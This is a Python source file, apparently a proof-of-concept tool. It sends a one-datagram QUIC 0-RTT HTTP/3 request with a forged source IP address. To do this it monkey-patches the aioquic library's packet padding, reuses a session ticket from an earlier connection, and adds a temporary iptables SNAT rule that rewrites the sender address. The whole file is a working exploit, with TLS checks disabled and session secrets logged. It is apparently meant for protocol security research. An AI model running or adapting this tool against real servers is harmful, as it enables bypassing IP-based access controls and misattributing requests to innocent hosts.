import asyncio
import contextlib
import dataclasses
import logging
from pathlib import Path
from urllib.parse import urlparse, ParseResult as URL
import ssl
import subprocess
from typing import Optional, cast
from unittest import mock

from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.asyncio.client import connect
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import QuicConnection, QuicConnectionState
from aioquic.quic.events import QuicEvent
from aioquic.quic.logger import QuicLogger
from aioquic.quic.packet import is_long_header
from aioquic.quic.packet_builder import QuicPacketBuilder, PACKET_NUMBER_SEND_SIZE
from aioquic.tls import SessionTicket, Epoch
from aioquic.quic.packet import PACKET_NUMBER_MAX_SIZE, PACKET_TYPE_INITIAL, PACKET_TYPE_MASK
import click


logging.basicConfig(level=logging.INFO)
log = logging.getLogger("client")


@dataclasses.dataclass
class HttpRequest:
    url: URL
    method: str = 'GET'
    headers: dict = dataclasses.field(default_factory=dict)
    data: bytes = b''


class HttpClient0Rtt(QuicConnectionProtocol):
    """
    aioquic client that sends valid 0-RTT packets with early data
    """
    def __init__(self, quic: QuicConnection, *args, **kwargs):
        # Monkey patch aioquic to use correct 0-RTT padding
        # problem with aioquic: sends 0-rtt handshake in multiple UDP packets
        #                       initial packet is padded (via QUIC padding frame), no space left for 0-rtt packet
        # see datagrams_to_send => _write_handshake(tls.Epoch.INITIAL) => start_packet => _end_packet (adds padding for initial packet)
        write_handshake_original = quic._write_handshake
        def write_handshake(builder: QuicPacketBuilder, epoch: Epoch, now):
            if epoch == Epoch.INITIAL:
                with mock.patch.object(builder, '_end_packet', lambda: self._end_packet(builder)):
                    write_handshake_original(builder, epoch, now)
                # import pdb; pdb.set_trace()
            write_handshake_original(builder, epoch, now)
        quic._write_handshake = write_handshake

        datagrams_to_send_original = quic.datagrams_to_send
        def datagrams_to_send(*args, **kwargs):
            out = []
            for data, addr in datagrams_to_send_original(*args, **kwargs):
                # Add UDP padding to all datagrams containing QUIC packets with long headers
                if is_long_header(data[0]) and len(data) < 1200:
                    data += b'\x00' * (1200 - len(data))
                out.append((data, addr))
            return out
        quic.datagrams_to_send = datagrams_to_send
        
        super().__init__(quic, *args, **kwargs)
        self.http: Optional[H3Connection] = H3Connection(self._quic)

    def connect(self, addr) -> None:
        self._quic.connect(addr, now=self._loop.time())
        # Do not transmit handshake packets yet. We might want to add a 0-RTT request first.
        # self.transmit()

    async def wait_connected(self) -> None:
        """
        Wait for the TLS handshake to complete.
        """
        assert self._connected_waiter is None, "already awaiting connected"
        if not self._connected:
            self._connected_waiter = self._loop.create_future()

            # Transmit handshake packets
            self.transmit()

            await asyncio.shield(self._connected_waiter)
    
    def quic_event_received(self, event: QuicEvent) -> None:
        # pass event to the HTTP layer
        if self.http is not None:
            for http_event in self.http.handle_event(event):
                self.http_event_received(http_event)

    def _end_packet(_, self) -> None:
        """
        Ends the current packet.
        """
        buf = self._buffer
        packet_size = buf.tell() - self._packet_start
        if packet_size > self._header_size:
            # padding to ensure sufficient sample size
            padding_size = (
                    PACKET_NUMBER_MAX_SIZE
                    - PACKET_NUMBER_SEND_SIZE
                    + self._header_size
                    - packet_size
            )

            # padding for initial datagram
            # if (
            #         self._is_client
            #         and self._packet_type == PACKET_TYPE_INITIAL
            #         and self._packet.is_ack_eliciting
            #         and self.remaining_flight_space
            #         and self.remaining_flight_space > padding_size
            # ):
            #     padding_size = self.remaining_flight_space

            # write padding
            if padding_size > 0:
                buf.push_bytes(bytes(padding_size))
                packet_size += padding_size
                self._packet.in_flight = True

                # log frame
                if self._quic_logger is not None:
                    self._packet.quic_logger_frames.append(
                        self._quic_logger.encode_padding_frame()
                    )

            # write header
            if self._packet_long_header:
                length = (
                        packet_size
                        - self._header_size
                        + PACKET_NUMBER_SEND_SIZE
                        + self._packet_crypto.aead_tag_size
                )

                buf.seek(self._packet_start)
                buf.push_uint8(self._packet_type | (PACKET_NUMBER_SEND_SIZE - 1))
                buf.push_uint32(self._version)
                buf.push_uint8(len(self._peer_cid))
                buf.push_bytes(self._peer_cid)
                buf.push_uint8(len(self._host_cid))
                buf.push_bytes(self._host_cid)
                if (self._packet_type & PACKET_TYPE_MASK) == PACKET_TYPE_INITIAL:
                    buf.push_uint_var(len(self._peer_token))
                    buf.push_bytes(self._peer_token)
                buf.push_uint16(length | 0x4000)
                buf.push_uint16(self._packet_number & 0xFFFF)
            else:
                buf.seek(self._packet_start)
                buf.push_uint8(
                    self._packet_type
                    | (self._spin_bit << 5)
                    | (self._packet_crypto.key_phase << 2)
                    | (PACKET_NUMBER_SEND_SIZE - 1)
                )
                buf.push_bytes(self._peer_cid)
                buf.push_uint16(self._packet_number & 0xFFFF)

            # encrypt in place
            plain = buf.data_slice(self._packet_start, self._packet_start + packet_size)
            buf.seek(self._packet_start)
            buf.push_bytes(
                self._packet_crypto.encrypt_packet(
                    plain[0: self._header_size],
                    plain[self._header_size: packet_size],
                    self._packet_number,
                )
            )
            self._packet.sent_bytes = buf.tell() - self._packet_start
            self._packets.append(self._packet)
            if self._packet.in_flight:
                self._datagram_flight_bytes += self._packet.sent_bytes

            # short header packets cannot be coalesced, we need a new datagram
            if not self._packet_long_header:
                self._flush_current_datagram()

            self._packet_number += 1
        else:
            # "cancel" the packet
            buf.seek(self._packet_start)

        self._packet = None
        self.quic_logger_frames = None


@contextlib.asynccontextmanager
async def iptables_ip_spoofing(victim_ip='127.0.0.1', victim_port='443', spoofed_source_ip='1.3.3.7'):
    # IP spoofing via iptables: rewrite source IP
    iptables_command = [
        'iptables',
        '--append', 'POSTROUTING',
        '--table', 'nat',
        '--protocol', 'udp',
        f'--destination', victim_ip,
        f'--dport', str(victim_port),
        '--jump', 'SNAT',
        f'--to-source', spoofed_source_ip,
    ]
    try:
        log.info('Setting up iptables rule for source IP spoofing')
        subprocess.run(iptables_command)

        yield
    finally:
        log.info('Cleaning up iptables rule for source IP spoofing')
        iptables_command[1] = '--delete'
        subprocess.run(iptables_command)


async def get_session_ticket(url: URL):
    configuration = QuicConfiguration(
        is_client=True,
        alpn_protocols=H3_ALPN,
        verify_mode=ssl.CERT_NONE,
        secrets_log_file=(Path(__file__).parent.parent / 'quic_secrets.log').open('a'),
        quic_logger=QuicLogger(),
    )

    # Connect to server and store session ticket for 0-RTT
    log.info('Initially connecting to server to get a session ticket')
    session_tickets = []
    async with connect(
            host=url.hostname,
            port=url.port or 443,
            configuration=configuration,
            create_protocol=HttpClient0Rtt,
            session_ticket_handler=lambda t: session_tickets.append(t),
            wait_connected=True
    ) as client:
        # Wait some time for the session ticket to be received
        await asyncio.sleep(1)
    log.info('Initial connection done')

    return session_tickets[-1] if len(session_tickets) > 0 else None


async def http_ip_spoofing(request: HttpRequest, spoofed_ip: str, session_ticket: SessionTicket):
    log.info('Building 0-RTT QUIC packet')
    configuration = QuicConfiguration(
        is_client=True,
        alpn_protocols=H3_ALPN,
        verify_mode=ssl.CERT_NONE,
        session_ticket=session_ticket,
        server_name=request.url.hostname,
        secrets_log_file=(Path(__file__).parent.parent / 'quic_secrets.log').open('a'),
    )

    async with connect(
        host=request.url.hostname,
        port=request.url.port or 443,
        configuration=configuration,
        create_protocol=HttpClient0Rtt,
        wait_connected=False
    ) as client:
        client = cast(HttpClient0Rtt, client)

        # Build HTTP/3 request
        stream_id = client._quic.get_next_available_stream_id()
        client.http.send_headers(
            stream_id=stream_id,
            headers=[
                (b":method", request.method.encode()),
                (b":scheme", request.url.scheme.encode()),
                (b":authority", request.url.netloc.encode()),
                (b":path", ((request.url.path or '/') + (f'?{request.url.query}' if request.url.query else '')).encode()),
            ] + [(k.lower().encode(), v.encode()) for (k, v) in request.headers.items()],
            end_stream=not request.data,
        )
        if request.data:
            client.http.send_data(
                stream_id=stream_id,
                data=request.data,
                end_stream=True
            )
        
        # Send UDP datagram
        datagrams = client._quic.datagrams_to_send(now=client._loop.time())
        assert len(datagrams) == 1, 'Request does not fit into 1 UDP packet'
        data, addr = datagrams[0]
        async with iptables_ip_spoofing(victim_ip=addr[0].removeprefix('::ffff:'), victim_port=addr[1], spoofed_source_ip=spoofed_ip):
            log.info('Sending 0-RTT packet')
            client._transport.sendto(data, addr)

        # Mark connection as closed
        client._quic._state = QuicConnectionState.TERMINATED
        client._closed.set()


async def main(url, spoofed_ip, method='GET', data=None, header=None) -> None:
    session_ticket = await get_session_ticket(url)
    assert session_ticket is not None, 'Server does not support 0-RTT: no session ticket received'
    assert session_ticket.max_early_data_size and session_ticket.max_early_data_size > 0, 'Server does not support 0-RTT early data: max_early_data_size == 0'

    data = data.encode() if data else None
    headers = dict(h.split(': ', 1) for h in header or [])
    spoofed_request = HttpRequest(
        url=url,
        method=method,
        data=data,
        headers=
            ({'Content-Length': str(len(data))} if data else {}) |
            ({'Content-Type': 'application/x-www-form-urlencoded'} if data and 'Content-Type' not in headers else {}) |
            headers,
    )
    await http_ip_spoofing(request=spoofed_request, spoofed_ip=spoofed_ip, session_ticket=session_ticket)


@click.command()
@click.argument('url', type=urlparse, default='https://127.0.0.1:4434/proxy/test')
@click.option('--spoofed-ip', type=str, default='1.3.3.7')
@click.option('-X', '--method', type=str, default='GET')
@click.option('-d', '--data', type=str, default=None)
@click.option('-H', '--header', type=str, multiple=True)
def cli_main(*args, **kwargs):
    asyncio.run(main(*args, **kwargs))

if __name__ == "__main__":
    cli_main()
